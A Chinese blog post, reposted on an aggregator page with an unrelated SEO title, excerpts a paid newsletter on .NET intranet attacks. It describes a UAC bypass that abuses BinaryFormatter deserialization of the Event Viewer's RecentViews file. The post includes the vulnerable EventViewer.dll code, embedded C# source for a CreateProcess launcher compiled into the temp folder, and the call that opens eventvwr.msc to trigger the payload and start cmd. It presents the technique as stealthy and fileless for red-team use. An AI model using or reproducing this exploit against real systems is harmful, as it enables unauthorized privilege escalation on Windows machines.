当前位置：首页 > news >正文

wordpress 插件查看/网站关键词优化方案

news 文章来源：https://blog.csdn.net/ahhacker86/article/details/143107729 2025/3/10 14:55:37

wordpress 插件查看,网站关键词优化方案,利用分类信息网站做推广,网站网上商城建设01阅读须知此文所节选自小报童《.NET 内网实战攻防》专栏，主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，对内网和后渗透感兴趣的朋友们可以订阅该电子报刊，解锁更多的报刊内容。 02基本介绍 03原理分析在渗透测试和红…

01阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏，主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，对内网和后渗透感兴趣的朋友们可以订阅该电子报刊，解锁更多的报刊内容。

02基本介绍

03原理分析

在渗透测试和红队活动中，权限提升是重要的一环，尤其是在没有管理员权限的情况下执行更高权限的操作。有一种思路利用 Windows 事件查看器 eventvwr.msc 的高权限加载特性和 XAML 反序列化机制，以绕过 UAC 限制。

3.1 Windows事件查看器

在 Windows 系统中，事件查看器Event Viewer是一个非常有用的管理工具，可以帮助系统管理员和安全分析人员查看系统日志、应用程序日志、安全日志等。通常情况位于当前系统用户下的AppData\Local\Microsoft\Event Viewer目录。

在事件查看器启动过程中，Windows 会自动加载 EventViewer.dll，这是事件查看器的核心 .NET 组件之一，提供事件记录的读取、解析和显示功能，如下图所示。

由于 EventViewer.dll内部调用了LoadMostRecentViewsDataFromFile方法，此方法调用BinaryFormatter().Deserialize方法反序列化读取最近的事件记录内容，核心漏洞代码如下所示。

private void LoadMostRecentViewsDataFromFile()
{try{if (!string.IsNullOrEmpty(EventsNode.recentViewsFile) && File.Exists(EventsNode.recentViewsFile)){FileStream fileStream = new FileStream(EventsNode.recentViewsFile, FileMode.Open);object syncRoot = EventsNode.recentViewsDataArrayList.SyncRoot;lock (syncRoot){EventsNode.recentViewsDataArrayList = (ArrayList)new BinaryFormatter().Deserialize(fileStream);}fileStream.Close();}
}catch (FileNotFoundException){}
}

3.2 动态编译启动新进程

首先代码中定义了一个名为 CreateSerializedData 的静态方法，方法内部的 text 字符串包含一段完整的.NET代码，用于创建一个控制台程序，内部使用了 DllImport 引入 Windows API 函数 CreateProcess，用于在桌面上创建一个新进程。

string text = "\r\nusing System;\r\nusing System.Runtime.InteropServices;\r\n\r\n\r\nclass HelloWorld\r\n{\r\n    [DllImport(\"kernel32.dll\")]\r\n    private static extern bool CreateProcess(\r\n     int dwCreationFlags,\r\n     IntPtr lpEnvironment,\r\n ref STARTUPINFO lpStartupInfo,\r\n     ref PROCESS_INFORMATION lpProcessInformation);\r\n\r\n    [StructLayout(LayoutKind.Sequential)]\r\n    struct STARTUPINFO\r\n    {\r\n        public Int32 cb;\r\n        public string lpReserved;\r\n        public string lpDesktop;\r\n        public string lpTitle;\r\n        public Int32 dwX;\r\n        public Int32 dwY;\r\n        public Int32 dwXSize;\r\n        public Int32 dwYSize;\r\n        public Int32 dwXCountChars;\r\n        public Int32 dwYCountChars;\r\n        public Int32 dwFillAttribute;\r\n        public Int32 dwFlags;\r\n        public Int16 wShowWindow;\r\n        public Int16 cbReserved2;\r\n        public IntPtr lpReserved2;\r\n        public IntPtr hStdInput;\r\n        public IntPtr hStdOutput;\r\n        public IntPtr hStdError;\r\n    }\r\n\r\n  internal struct PROCESS_INFORMATION\r\n    {\r\n        public IntPtr hProcess;\r\n        public IntPtr hThread;\r\n        public int dwProcessId;\r\n        public int dwThreadId;\r\n    }\r\n    \r\n\r\n    static void Main(string[] args)\r\n    {\r\n        string DesktopName=args[0];\r\n        string argumentsAsString = string.Join(\" \", args, 1, args.Length - 1);\r\n        STARTUPINFO si = new STARTUPINFO();\r\n        si.cb = Marshal.SizeOf(si);\r\n        si.lpDesktop = DesktopName;\r\n        PROCESS_INFORMATION pi = new PROCESS_INFORMATION();\r\n        bool success = CreateProcess(\r\n            null,\r\n            argumentsAsString,\r\n            IntPtr.Zero,\r\n            IntPtr.Zero,\r\n            false,\r\n            48,\r\n            IntPtr.Zero,\r\n            null,\r\n            ref si,\r\n            ref pi);\r\n    }\r\n}\r\n";
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("Compling StartInSelectedDesktop...");
compilerParameters.GenerateExecutable = true;
compilerParameters.OutputAssembly = Path.Combine(Path.GetTempPath(), "StartInSelectedDesktop.exe");

3.3 白加黑启动绕过UAC

利用 eventvwr.msc 进程来触发恶意载荷的反序列化，从而绕过用户账户控制 (UAC) 限制启动新的 cmd 进程。因为此时恶意负载已经写入到 C:\Users\Ivan1ee\AppData\Local\Microsoft\Event Viewer\RecentViews，自动化打开事件查看器即可触发漏洞。具体代码如下所示

if (!Program.CreateProcess(null, "cmd /c start \"\" \"%windir%\\system32\\eventvwr.msc\"", IntPtr.Zero, IntPtr.Zero, false, 48, IntPtr.Zero, null, ref structure, ref process_INFORMATION))

综上，利用了Windows事件查看器的反序列化漏洞，具备强大的UAC绕过能力。在红队渗透测试中，其高度隐蔽性和无文件特性而受到广泛应用。

04.NET 电子报刊

小报童电子报刊【.NET内网安全攻防】，引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足，为用户读者提供更佳的阅读体验。内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，可细分为以下8个方向。

1） .NET 安全防御绕过
2） .NET 本地权限提升
3） .NET 内网信息收集
4） .NET 内网代理通道
5） .NET 内网横向移动
6） .NET 目标权限维持
7） .NET 数据传输外发
8） .NET 目标痕迹清理

wordpress 插件查看/网站关键词优化方案

01阅读须知

02基本介绍

03原理分析

3.1 Windows事件查看器

3.2 动态编译启动新进程

3.3 白加黑启动绕过UAC

04.NET 电子报刊

相关文章：

.NET内网实战：通过白名单文件反序列化漏洞绕过UAC

AI Agents - 自动化项目：计划、评估和分配

Git的.gitignore文件

网站安全，WAF网站保护暴力破解

深度学习：梯度下降算法简介

SparkSQL整合Hive后，如何启动hiveserver2服务

前端路由如何从0开始配置？vue-router 的使用

Java中的运算符【与C语言的区别】

二、基础语法

DB-GPT系列（一）：DB-GPT能帮你做什么？

【Python各个击破】numpy

【STM32 Blue Pill编程实例】-4位7段数码管使用

[进阶]java基础之集合(三)数据结构

《Apache Cordova/PhoneGap 使用技巧分享》

SCP（Secure Copy

uniApp 省市区自定义数据

图解Redis 06 | Hash数据类型的原理及应用场景

在 Windows 系统上设置 MySQL8.0以支持远程连接

四种基本的编程命名规范

【前端】在 TypeScript 中使用 AbortController 取消异步请求

k8s知识点总结

论文阅读：三星-TinyClick

Windows on ARM上使用sherpa-onnx实现语音识别

Unity 打包AB Timeline 引用丢失，错误问题

【Kettle的安装与使用】使用Kettle实现mysql和hive的数据传输（使用Kettle将mysql数据导入hive、将hive数据导入mysql）

STM32的hal库在实现延时函数（例如：Delay_ms 等）为什么用滴答定时（Systick）而不是定时器定时中断，也不是RTC？

刚刚买的域名被DNS劫持了怎么处理

递归算法专题

Logstash 迁移索引元数据（设置和映射）

用python将pdf转成图片转换成对应的word文件